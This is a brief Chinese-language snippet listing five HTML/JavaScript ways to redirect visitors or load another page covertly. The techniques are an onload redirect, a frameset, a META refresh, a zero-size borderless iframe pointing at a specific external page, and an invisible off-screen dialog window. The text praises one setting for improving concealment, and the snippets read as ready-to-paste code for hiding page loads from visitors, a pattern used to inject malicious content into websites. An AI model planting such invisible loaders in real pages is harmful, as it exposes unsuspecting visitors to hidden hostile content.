1. window.location 法,代码如下
<body onload="window.location=’http://xxxxx’;"></body>
2. 框架法,代码如下
<frameset cols="100%,*">
<frame src="http://xxxxx" scrolling="auto">
</frameset>
其中scrolling参数值得注意,合理使用可加强隐蔽性。Cols参数可根据自己的实际情况作更改。
3. META标志法,代码如下
<META HTTP-EQUIV="Refresh" CONTENT="0;URL= http://xxxxx">
其中CONTENT后面的阿拉伯数字是代表过几秒中钟转入目标网页。
4. iframe内帧法
<iframe src="http://wukong.php2h.com/052.html" width="0" height="0" frameborder="0"></iframe>
<body onload=window.status="">
5,对话框法:
<script>
//window.showModelessDialog("javascript:window.open(‘http://www.baidu.com’,’k’,’top=3000,left=3000,width=0,height=0′);window.close();","n","scroll:0;status:0;help:0;resizable:0;dialogWidth:0px;dialogHeight:0px");
</script>